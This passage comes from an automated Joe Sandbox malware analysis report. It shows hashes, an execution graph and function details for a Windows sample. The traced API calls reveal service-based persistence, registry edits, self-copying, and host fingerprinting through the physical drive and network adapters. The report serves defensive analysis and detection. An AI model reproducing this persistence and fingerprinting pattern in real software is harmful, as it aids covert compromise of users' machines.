                                                                                      • Instruction Fuzzy Hash: B7E0ED71D0060DABCF00EBE5DC418EEB7BCFA08314F40067BA814E3295E734A6098B94
                                                                                      Function 00454060 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastSleep
                                                                                      • String ID:
                                                                                      • API String ID: 1458359878-0
                                                                                      • Opcode ID: 8b4360f2b479ea038ec97fb2a00d6f0221d541355e91bee91f30916643827583
                                                                                      • Instruction ID: 017d81aa95838fcb6bb112513f86caaf4ff52444f8b7b5a451e770b39712fdff
                                                                                      • Opcode Fuzzy Hash: 8b4360f2b479ea038ec97fb2a00d6f0221d541355e91bee91f30916643827583
                                                                                      • Instruction Fuzzy Hash: B8F0F632A00524578E20A9AE998192F62CDDAC0B6D730052BEF04DF283D439CC854AAE

                                                                                      Execution Graph

                                                                                      Execution Coverage:6%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:4.1%
                                                                                      Total number of Nodes:460
                                                                                      Total number of Limit Nodes:8
                                                                                      execution_graph 3451 402142 3452 402147 3451->3452 3453 40d75a GetModuleHandleA 3452->3453 3454 40d73b GetModuleFileNameA 3453->3454 3454->3453 3557 402682 3558 402686 3557->3558 3558->3558 3559 40268a CloseServiceHandle 3558->3559 3560 40d982 3559->3560 3505 4031c3 3510 40545b 3505->3510 3507 4053e6 6 API calls 3508 4031d1 3507->3508 3508->3507 3509 403203 3508->3509 3511 405488 3510->3511 3515 40546b 3510->3515 3512 4054a6 3511->3512 3513 4053e6 6 API calls 3511->3513 3514 406897 9 API calls 3512->3514 3512->3515 3513->3512 3514->3515 3515->3508 3561 403283 3562 403291 3561->3562 3563 4032ac 3561->3563 3568 4058b8 3562->3568 3571 4058e5 3563->3571 3566 40329a 3567 4032b5 3574 406c87 3568->3574 3570 4058d4 3570->3566 3572 406c87 6 API calls 3571->3572 3573 405901 3572->3573 3573->3567 3577 406cc2 3574->3577 3575 4053e6 6 API calls 3578 406f77 3575->3578 3576 4053e6 6 API calls 3576->3577 3577->3576 3577->3578 3581 406f6f 3577->3581 3578->3575 3580 406fc2 3578->3580 3579 4053e6 6 API calls 3579->3580 3580->3579 3580->3581 3581->3570 3516 40d1c4 3519 401f64 FindResourceA 3516->3519 3518 40d1c9 3520 401f86 GetLastError SizeofResource 3519->3520 3521 401f9f 3519->3521 3520->3521 3522 401fa6 LoadResource LockResource GlobalAlloc 3520->3522 3521->3518 3523 401fd2 3522->3523 3524 401ffb GetTickCount 3523->3524 3526 402005 GlobalAlloc 3524->3526 3526->3521 3582 404184 3584 40418c 3582->3584 3583 40421e 3584->3583 3586 404094 RtlUnwind 3584->3586 3587 4040ac 3586->3587 3587->3584 3455 402845 3456 40284a 3455->3456 3457 4028f2 GetCommandLineW CommandLineToArgvW 3456->3457 3458 40d3c6 GetLocalTime 3457->3458 3459 401f27 27 API calls 3458->3459 3460 40d3d1 3459->3460 3588 402588 3589 40d117 CreateServiceA 3588->3589 3461 40684b 3462 406852 3461->3462 3463 406883 3462->3463 3464 40685a MultiByteToWideChar 3462->3464 3464->3463 3465 406873 GetStringTypeW 3464->3465 3465->3463 3591 40418c 3592 40421e 3591->3592 3594 4041aa 3591->3594 3593 404094 RtlUnwind 3593->3594 3594->3592 3594->3593 3184 40364d 3185 403659 GetCurrentProcess TerminateProcess 3184->3185 3188 40366a 3184->3188 3185->3188 3186 4036e4 3187 4036d4 ExitProcess 3188->3186 3188->3187 3496 40250e 3498 402501 3496->3498 3497 40d955 RegQueryValueExA 3497->3498 3498->3496 3498->3497 3499 40d661 RegCloseKey 3498->3499 3500 402528 3498->3500 3499->3497 3500->3500 3501 402810 VirtualAlloc 3502 40d38e 3501->3502 3432 402914 RegCloseKey 3433 40d8a7 3432->3433 3466 402254 3467 40d09d CreateFileA CloseHandle 3466->3467 3468 40da53 ExitProcess 3467->3468 3469 402155 3470 402592 wsprintfA 3469->3470 3471 40d06e 3470->3471 3435 402299 StartServiceCtrlDispatcherA 3436 402931 3435->3436 3531 4022d9 Sleep 3532 4025bf 3531->3532 3437 40225a 3438 40225f 3437->3438 3439 40d904 CopyFileA 3438->3439 3533 402fdb 3540 40363c 3533->3540 3535 402fe6 3536 402ff4 3535->3536 3537 404264 7 API calls 3535->3537 3538 40429d 7 API calls 3536->3538 3537->3536 3539 402ffd 3538->3539 3541 40364d 3 API calls 3540->3541 3542 403649 3541->3542 3542->3535 3447 40d11d OpenSCManagerA 3448 40d8ee 3447->3448 3449 40269d CreateDirectoryA 3450 40d1b2 3449->3450 3472 40235e 3473 4023b0 3472->3473 3474 402365 3472->3474 3474->3473 3475 402370 GetLastError SetServiceStatus SetEvent 3474->3475 3475->3473 3476 406a5f 3477 406a6d 3476->3477 3478 406a71 LCMapStringW 3477->3478 3481 406a25 3477->3481 3479 406a89 WideCharToMultiByte 3478->3479 3478->3481 3479->3481 3482 40d460 RegSetValueExA RegCloseKey 3483 40da8b 3482->3483 3486 4022cb 3483->3486 3487 4022f2 WaitForSingleObject 3486->3487 3595 402ea0 3596 402ea5 3595->3596 3599 40319a GetModuleHandleA 3596->3599 3598 402eaa 3600 4031a9 GetProcAddress 3599->3600 3601 4031b9 3599->3601 3600->3601 3601->3598 3546 4021e3 GetTickCount 3547 40231c 3546->3547 3548 405de5 3549 402fe6 7 API calls 3548->3549 3550 405dec 3549->3550 3551 4022e7 3552 4025c5 GetModuleFileNameA 3551->3552 3553 40d138 3552->3553 3070 40d3ab 3071 40d3c6 GetLocalTime 3070->3071 3072 40d3af 3070->3072 3075 401f27 3071->3075 3072->3071 3076 401f3c 3075->3076 3079 401a1d 3076->3079 3078 401f45 3080 401a2c 3079->3080 3085 401a4f CreateFileA 3080->3085 3084 401a3e 3084->3078 3086 401a35 3085->3086 3087 401a7d 3085->3087 3093 401b4b LoadLibraryA 3086->3093 3088 401a98 DeviceIoControl 3087->3088 3090 401b3a FindCloseChangeNotification 3087->3090 3091 401b0e GetLastError 3087->3091 3102 402ce6 3087->3102 3105 402cd8 3087->3105 3088->3087 3090->3086 3091->3087 3091->3090 3094 401c21 3093->3094 3095 401b6e GetProcAddress 3093->3095 3094->3084 3096 401c18 FreeLibrary 3095->3096 3099 401b85 3095->3099 3096->3094 3097 401b95 GetAdaptersInfo 3097->3099 3098 402ce6 7 API calls 3098->3099 3099->3097 3099->3098 3100 401c15 3099->3100 3101 402cd8 12 API calls 3099->3101 3100->3096 3101->3099 3108 4030e1 3102->3108 3138 403041 3105->3138 3109 4030ed 3108->3109 3117 402cef 3108->3117 3110 4030f7 3109->3110 3111 40310d 3109->3111 3113 403139 HeapFree 3110->3113 3114 403103 3110->3114 3112 403138 3111->3112 3116 403127 3111->3116 3112->3113 3113->3117 3119 40447e 3114->3119 3125 404f0f 3116->3125 3117->3087 3120 4044bc 3119->3120 3124 404772 3119->3124 3121 4046b8 VirtualFree 3120->3121 3120->3124 3122 40471c 3121->3122 3123 40472b VirtualFree HeapFree 3122->3123 3122->3124 3123->3124 3124->3117 3126 404f52 3125->3126 3127 404f3c 3125->3127 3126->3117 3127->3126 3129 404df6 3127->3129 3132 404e03 3129->3132 3130 404eb3 3130->3126 3131 404e24 VirtualFree 3131->3132 3132->3130 3132->3131 3134 404da0 VirtualFree 3132->3134 3135 404dbd 3134->3135 3136 404ded 3135->3136 3137 404dcd HeapFree 3135->3137 3136->3132 3137->3132 3139 402ce3 3138->3139 3141 403048 3138->3141 3139->3087 3141->3139 3142 40306d 3141->3142 3143 40307c 3142->3143 3146 403091 3142->3146 3150 40308a 3143->3150 3151 4047a7 3143->3151 3145 4030d0 HeapAlloc 3147 4030df 3145->3147 3146->3145 3146->3150 3157 404f54 3146->3157 3147->3141 3148 40308f 3148->3141 3150->3145 3150->3147 3150->3148 3152 4047d9 3151->3152 3153 404878 3152->3153 3156 404887 3152->3156 3164 404ab0 3152->3164 3153->3156 3171 404b61 3153->3171 3156->3150 3162 404f62 3157->3162 3158 40504e VirtualAlloc 3163 40501f 3158->3163 3159 405123 3175 404c5c 3159->3175 3162->3158 3162->3159 3162->3163 3163->3150 3165 404af3 HeapAlloc 3164->3165 3166 404ac3 HeapReAlloc 3164->3166 3168 404b43 3165->3168 3169 404b19 VirtualAlloc 3165->3169 3167 404ae2 3166->3167 3166->3168 3167->3165 3168->3153 3169->3168 3170 404b33 HeapFree 3169->3170 3170->3168 3172 404b73 VirtualAlloc 3171->3172 3174 404bbc 3172->3174 3174->3156 3176 404c70 HeapAlloc 3175->3176 3177 404c69 3175->3177 3178 404c8d VirtualAlloc 3176->3178 3183 404cc5 3176->3183 3177->3178 3179 404d82 3178->3179 3180 404cad VirtualAlloc 3178->3180 3181 404d8a HeapFree 3179->3181 3179->3183 3182 404d74 VirtualFree 3180->3182 3180->3183 3181->3183 3182->3179 3183->3163 3602 4069ab 3603 4069ba 3602->3603 3604 406a25 3603->3604 3605 4069bf MultiByteToWideChar 3603->3605 3605->3604 3606 4069d8 LCMapStringW 3605->3606 3606->3604 3607 4069f3 3606->3607 3608 4069f9 3607->3608 3610 406a39 3607->3610 3608->3604 3609 406a07 LCMapStringW 3608->3609 3609->3604 3610->3604 3611 406a71 LCMapStringW 3610->3611 3611->3604 3612 406a89 WideCharToMultiByte 3611->3612 3612->3604 3489 40226e 3490 402277 GetLastError 3489->3490 3189 402ef0 GetVersion 3213 404034 HeapCreate 3189->3213 3191 402f4f 3192 402f54 3191->3192 3193 402f5c 3191->3193 3288 40300b 3192->3288 3225 403d14 3193->3225 3197 402f64 GetCommandLineA 3239 403be2 3197->3239 3201 402f7e 3271 4038dc 3201->3271 3203 402f83 3204 402f88 GetStartupInfoA 3203->3204 3284 403884 3204->3284 3206 402f9a GetModuleHandleA 3208 402fbe 3206->3208 3294 40362b 3208->3294 3214 404054 3213->3214 3215 40408a 3213->3215 3301 403eec 3214->3301 3215->3191 3218 404070 3221 40408d 3218->3221 3223 404c5c 5 API calls 3218->3223 3219 404063 3313 40440b HeapAlloc 3219->3313 3221->3191 3222 40406d 3222->3221 3224 40407e HeapDestroy 3222->3224 3223->3222 3224->3215 3369 40302f 3225->3369 3228 403d33 GetStartupInfoA 3236 403e44 3228->3236 3238 403d7f 3228->3238 3231 403eab SetHandleCount 3231->3197 3232 403e6b GetStdHandle 3234 403e79 GetFileType 3232->3234 3232->3236 3233 40302f 12 API calls 3233->3238 3234->3236 3235 403df0 3235->3236 3237 403e12 GetFileType 3235->3237 3236->3231 3236->3232 3237->3235 3238->3233 3238->3235 3238->3236 3240 403c30 3239->3240 3241 403bfd GetEnvironmentStringsW 3239->3241 3242 403c05 3240->3242 3243 403c21 3240->3243 3241->3242 3244 403c11 GetEnvironmentStrings 3241->3244 3246 403c49 WideCharToMultiByte 3242->3246 3247 403c3d GetEnvironmentStringsW 3242->3247 3245 402f74 3243->3245 3248 403cc3 GetEnvironmentStrings 3243->3248 3249 403ccf 3243->3249 3244->3243 3244->3245 3262 403995 3245->3262 3251 403c7d 3246->3251 3252 403caf FreeEnvironmentStringsW 3246->3252 3247->3245 3247->3246 3248->3245 3248->3249 3253 40302f 12 API calls 3249->3253 3254 40302f 12 API calls 3251->3254 3252->3245 3255 403cea 3253->3255 3256 403c83 3254->3256 3258 403d00 FreeEnvironmentStringsA 3255->3258 3256->3252 3257 403c8c WideCharToMultiByte 3256->3257 3259 403ca6 3257->3259 3260 403c9d 3257->3260 3258->3245 3259->3252 3261 4030e1 7 API calls 3260->3261 3261->3259 3263 4039a7 3262->3263 3264 4039ac GetModuleFileNameA 3262->3264 3398 4061f4 3263->3398 3266 4039cf 3264->3266 3267 40302f 12 API calls 3266->3267 3268 4039f0 3267->3268 3269 402fe6 7 API calls 3268->3269 3270 403a00 3268->3270 3269->3270 3270->3201 3272 4038e9 3271->3272 3274 4038ee 3271->3274 3273 4061f4 19 API calls 3272->3273 3273->3274 3275 40302f 12 API calls 3274->3275 3276 40391b 3275->3276 3277 402fe6 7 API calls 3276->3277 3281 40392f 3276->3281 3277->3281 3278 403972 3279 4030e1 7 API calls 3278->3279 3280 40397e 3279->3280 3280->3203 3281->3278 3282 40302f 12 API calls 3281->3282 3283 402fe6 7 API calls 3281->3283 3282->3281 3283->3281 3285 40388d 3284->3285 3287 403892 3284->3287 3286 4061f4 19 API calls 3285->3286 3286->3287 3287->3206 3289 403014 3288->3289 3290 403019 3288->3290 3291 404264 7 API calls 3289->3291 3292 40429d 7 API calls 3290->3292 3291->3290 3293 403022 ExitProcess 3292->3293 3422 40364d 3294->3422 3297 403700 3298 40370c 3297->3298 3299 403835 UnhandledExceptionFilter 3298->3299 3300 402fd8 3298->3300 3299->3300 3315 402d80 3301->3315 3304 403f15 3305 403f2f GetEnvironmentVariableA 3304->3305 3306 403f27 3304->3306 3308 403f4e 3305->3308 3312 40400c 3305->3312 3306->3218 3306->3219 3309 403f93 GetModuleFileNameA 3308->3309 3310 403f8b 3308->3310 3309->3310 3310->3312 3317 406210 3310->3317 3312->3306 3320 403ebf GetModuleHandleA 3312->3320 3314 404427 3313->3314 3314->3222 3316 402d8c GetVersionExA 3315->3316 3316->3304 3316->3305 3322 406227 3317->3322 3321 403ed6 3320->3321 3321->3306 3324 40623f 3322->3324 3326 40626f 3324->3326 3329 4053e6 3324->3329 3325 4053e6 6 API calls 3325->3326 3326->3325 3328 406223 3326->3328 3333 4073eb 3326->3333 3328->3312 3330 405404 3329->3330 3332 4053f8 3329->3332 3339 40674e 3330->3339 3332->3324 3334 407416 3333->3334 3338 4073f9 3333->3338 3335 407432 3334->3335 3336 4053e6 6 API calls 3334->3336 3335->3338 3351 406897 3335->3351 3336->3335 3338->3326 3340 406797 3339->3340 3341 40677f GetStringTypeW 3339->3341 3343 4067c2 GetStringTypeA 3340->3343 3344 4067e6 3340->3344 3341->3340 3342 40679b GetStringTypeA 3341->3342 3342->3340 3345 406883 3342->3345 3343->3345 3344->3345 3347 4067fc MultiByteToWideChar 3344->3347 3345->3332 3347->3345 3348 406820 3347->3348 3348->3345 3349 40685a MultiByteToWideChar 3348->3349 3349->3345 3350 406873 GetStringTypeW 3349->3350 3350->3345 3352 4068c7 LCMapStringW 3351->3352 3353 4068e3 3351->3353 3352->3353 3354 4068eb LCMapStringA 3352->3354 3356 406949 3353->3356 3357 40692c LCMapStringA 3353->3357 3354->3353 3355 406a25 3354->3355 3355->3338 3356->3355 3358 40695f MultiByteToWideChar 3356->3358 3357->3355 3358->3355 3359 406989 3358->3359 3359->3355 3360 4069bf MultiByteToWideChar 3359->3360 3360->3355 3361 4069d8 LCMapStringW 3360->3361 3361->3355 3362 4069f3 3361->3362 3363 4069f9 3362->3363 3365 406a39 3362->3365 3363->3355 3364 406a07 LCMapStringW 3363->3364 3364->3355 3365->3355 3366 406a71 LCMapStringW 3365->3366 3366->3355 3367 406a89 WideCharToMultiByte 3366->3367 3367->3355 3370 403041 12 API calls 3369->3370 3371 40303e 3370->3371 3371->3228 3372 402fe6 3371->3372 3373 402ff4 3372->3373 3374 402fef 3372->3374 3384 40429d 3373->3384 3378 404264 3374->3378 3379 40426e 3378->3379 3380 40429d 7 API calls 3379->3380 3383 40429b 3379->3383 3381 404285 3380->3381 3382 40429d 7 API calls 3381->3382 3382->3383 3383->3373 3387 4042b0 3384->3387 3385 402ffd 3385->3228 3386 4043c7 3390 4043da GetStdHandle WriteFile 3386->3390 3387->3385 3387->3386 3388 4042f0 3387->3388 3388->3385 3389 4042fc GetModuleFileNameA 3388->3389 3391 404314 3389->3391 3390->3385 3393 4065b8 3391->3393 3394 4065c5 LoadLibraryA 3393->3394 3396 406607 3393->3396 3395 4065d6 GetProcAddress 3394->3395 3394->3396 3395->3396 3397 4065ed GetProcAddress GetProcAddress 3395->3397 3396->3385 3397->3396 3399 4061fd 3398->3399 3400 406204 3398->3400 3402 405e30 3399->3402 3400->3264 3409 405fc9 3402->3409 3404 405fbd 3404->3400 3407 405e73 GetCPInfo 3408 405e87 3407->3408 3408->3404 3414 40606f GetCPInfo 3408->3414 3410 405fe9 3409->3410 3411 405fd9 GetOEMCP 3409->3411 3412 405e41 3410->3412 3413 405fee GetACP 3410->3413 3411->3410 3412->3404 3412->3407 3412->3408 3413->3412 3415 40615a 3414->3415 3416 406092 3414->3416 3415->3404 3417 40674e 6 API calls 3416->3417 3418 40610e 3417->3418 3419 406897 9 API calls 3418->3419 3420 406132 3419->3420 3421 406897 9 API calls 3420->3421 3421->3415 3423 403659 GetCurrentProcess TerminateProcess 3422->3423 3426 40366a 3422->3426 3423->3426 3424 402fc7 3424->3297 3425 4036d4 ExitProcess 3426->3424 3426->3425 3427 402571 RegCreateKeyExA 3428 40d427 3427->3428 3429 40d8a7 3428->3429 3430 40d42d 3428->3430 3431 40d483 GetTickCount 3430->3431 3431->3429 3614 4023b3 RegisterServiceCtrlHandlerA 3615 4023d6 3614->3615 3616 4024cc 3614->3616 3617 4023e4 SetServiceStatus GetLastError CreateEventA 3615->3617 3618 40245d SetServiceStatus CreateThread WaitForSingleObject CloseHandle 3617->3618 3619 40243e GetLastError 3617->3619 3620 4024c3 SetServiceStatus 3618->3620 3619->3620 3620->3616 3434 40d639 RegSetValueExA 3440 40d23a RegOpenKeyExA 3441 40d24b 3440->3441 3492 40d07a 3493 40daa7 LoadLibraryExA 3492->3493 3442 40da3b 3443 40d475 3442->3443 3444 40da42 3443->3444 3445 40d661 RegCloseKey 3443->3445 3446 40d955 RegQueryValueExA 3445->3446 3446->3443 3503 40263c SetEvent 3504 40d397 3503->3504 3621 4022bc 3622 402823 wsprintfA 3621->3622 3494 40227f GetProcAddress 3495 4026ae 3494->3495 3554 4026ff 3555 402704 RegCreateKeyExA 3554->3555

                                                                                      Executed Functions

                                                                                      Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                      • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                      • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                      • API String ID: 514930453-3667123677
                                                                                      • Opcode ID: a3c77d1947fac9ed500e02c632cb5410261389502922d6f95d8c76429a6c9e05
                                                                                      • Instruction ID: 2fcbbae68a7f2e143e0ba6fa3878dab2488d9b05c73812711a2b91e8578584ab
                                                                                      • Opcode Fuzzy Hash: a3c77d1947fac9ed500e02c632cb5410261389502922d6f95d8c76429a6c9e05
                                                                                      • Instruction Fuzzy Hash: E521A770904109AEEF119B65CD447EF7BB8EF41344F1440BAD504B22E1E7789985CB69
                                                                                      Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 26 401a4f-401a77 CreateFileA 27 401b45-401b4a 26->27 28 401a7d-401a91 26->28 29 401a98-401ac0 DeviceIoControl 28->29 30 401ac2-401aca 29->30 31 401af3-401afb 29->31 34 401ad4-401ad9 30->34 35 401acc-401ad2 30->35 32 401b04-401b07 31->32 33 401afd-401b03 call 402ce6 31->33 38 401b09-401b0c 32->38 39 401b3a-401b44 FindCloseChangeNotification 32->39 33->32 34->31 36 401adb-401af1 call 402d00 call 4018cc 34->36 35->31 36->31 42 401b27-401b34 call 402cd8 38->42 43 401b0e-401b17 GetLastError 38->43 39->27 42->29 42->39 43->39 45 401b19-401b1c 43->45 45->42 49 401b1e-401b24 45->49 49->42
                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                      • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                      • GetLastError.KERNEL32 ref: 00401B0E
                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                      • String ID: \\.\PhysicalDrive0
                                                                                      • API String ID: 3786717961-1180397377
                                                                                      • Opcode ID: 87e5aa96cf8bbfa53ba141c063bc04efd036a70200bde10c5f99651d25558048
                                                                                      • Instruction ID: 04828827cee311aa1ccd055820d70034eb57b3ddca3c9d8c28a7d5788a1782d0
                                                                                      • Opcode Fuzzy Hash: 87e5aa96cf8bbfa53ba141c063bc04efd036a70200bde10c5f99651d25558048
                                                                                      • Instruction Fuzzy Hash: 43318D71D00118EADB21AFA5CD849EFBBB9FF41750F20407AE554B22A0E7785E45CB98
                                                                                      Function 00402299 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 167 402299-4022a1 StartServiceCtrlDispatcherA 168 402931-402937 167->168
                                                                                      APIs
                                                                                      • StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040229A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CtrlDispatcherServiceStart
                                                                                      • String ID:
                                                                                      • API String ID: 3789849863-0
                                                                                      • Opcode ID: c003d29a70a172e29de59ed7b689d9b07ce4a3aef7e76657a3f1d292d186b6c5
                                                                                      • Instruction ID: 7236fdf905961642a5bbbc3fb68be642bec8eaa1085a8ac3c622be18bd149764
                                                                                      • Opcode Fuzzy Hash: c003d29a70a172e29de59ed7b689d9b07ce4a3aef7e76657a3f1d292d186b6c5
                                                                                      • Instruction Fuzzy Hash: 55B0127330C10446C30057B8BE4C59F234CE38633AB104C37C04FE00E1D6B8C04A5524
                                                                                      Function 00402EF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetVersion.KERNEL32 ref: 00402F16
                                                                                        • Part of subcall function 00404034: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F4F,00000000), ref: 00404045
                                                                                        • Part of subcall function 00404034: HeapDestroy.KERNEL32 ref: 00404084
                                                                                      • GetCommandLineA.KERNEL32 ref: 00402F64
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00402F8F
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FB2
                                                                                        • Part of subcall function 0040300B: ExitProcess.KERNEL32 ref: 00403028
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                      • String ID: Y
                                                                                      • API String ID: 2057626494-4136946213
                                                                                      • Opcode ID: 2a5b16c506521380fd9b5f66b06519665ea10880a1b1eb47f363de886a19e373
                                                                                      • Instruction ID: 31bd938ea51fadde60a3d0ec437c396cd65a6e637b97124abe794e54387ab133
                                                                                      • Opcode Fuzzy Hash: 2a5b16c506521380fd9b5f66b06519665ea10880a1b1eb47f363de886a19e373
                                                                                      • Instruction Fuzzy Hash: 19216DB1800615AAD714AFA6DE49A6E7FB8EB44719F10413FF505BB2D1DB385500CA58
                                                                                      Function 00402845 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 79 402845-40d446 call 402db0 GetCommandLineW CommandLineToArgvW GetLocalTime call 401f27 88 40d8a7 79->88 89 40d44c-40d451 79->89 90 40dba7 88->90 89->90 91 40dbaa 90->91 91->91
                                                                                      APIs
                                                                                      • GetCommandLineW.KERNEL32(?), ref: 004028F2
                                                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 004028F9
                                                                                      • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D3C6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CommandLine$ArgvLocalTime
                                                                                      • String ID: /chk$XiM#
                                                                                      • API String ID: 3768950922-2768313731
                                                                                      • Opcode ID: 58e77e24c0e44735d9c25947b9bd7a71b097def894af762cde97e617ba063816
                                                                                      • Instruction ID: f8a697a6ba56cfa0421d3161c88fb5920d4a750ed1aa0ba2803a0c5cf8bd7934
                                                                                      • Opcode Fuzzy Hash: 58e77e24c0e44735d9c25947b9bd7a71b097def894af762cde97e617ba063816
                                                                                      • Instruction Fuzzy Hash: 59E06D75C08202EEC7007BE0AF098AC77B4AA08301320817FE556B51D0CB7C548AAB2F
                                                                                      Function 0040250E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42registryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 92 40250e-402510 93 402512-402526 92->93 94 402574-4025e7 92->94 95 402501-402507 93->95 96 402528-40253d 93->96 98 40d955-40d960 RegQueryValueExA 94->98 95->92 99 40da3c 98->99 100 40da42 99->100 101 40d475-40d66c RegCloseKey 99->101 103 40da44 100->103 101->98 103->103
                                                                                      APIs
                                                                                      • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040D958
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID: Common AppData$NL5$
                                                                                      • API String ID: 3660427363-3642351906
                                                                                      • Opcode ID: ed0e5acd8f8ece743e598616439700d4f440e59f7496dd527ca1e1139eb0ac89
                                                                                      • Instruction ID: 3625f9f7bcec903c70c52d49b5d04ab8b5a9762ab31523acee7a4a548b3f6f63
                                                                                      • Opcode Fuzzy Hash: ed0e5acd8f8ece743e598616439700d4f440e59f7496dd527ca1e1139eb0ac89
                                                                                      • Instruction Fuzzy Hash: 6A019971C18B40FBCB054FB09E18A697F74AB46710715427BD851720F1D3B8885BEA4F
                                                                                      Function 0040D3AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
